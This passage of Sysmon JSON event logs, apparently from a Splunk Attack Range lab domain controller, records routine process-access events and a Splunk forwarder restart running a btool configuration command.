{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3002,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3003,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00101C0E0500}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00101C0E0500}","TargetProcessId":"5020","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3004,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.516\r\nProcessGuid: {A837DB8D-0238-5F25-0000-0010E1100500}\r\nProcessId: 5024\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nParentProcessId: 4932\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.516","ProcessGuid":"{A837DB8D-0238-5F25-0000-0010E1100500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","ParentProcessId":"4932","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3005,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-0010E1100500}\r\nTargetProcessId: 5024\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1893f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17106|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1385a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","SourceProcessId":"4932","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-0010E1100500}","TargetProcessId":"5024","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1893f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17106|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1385a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-0010E1100500}\r\nTargetProcessId: 5024\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: 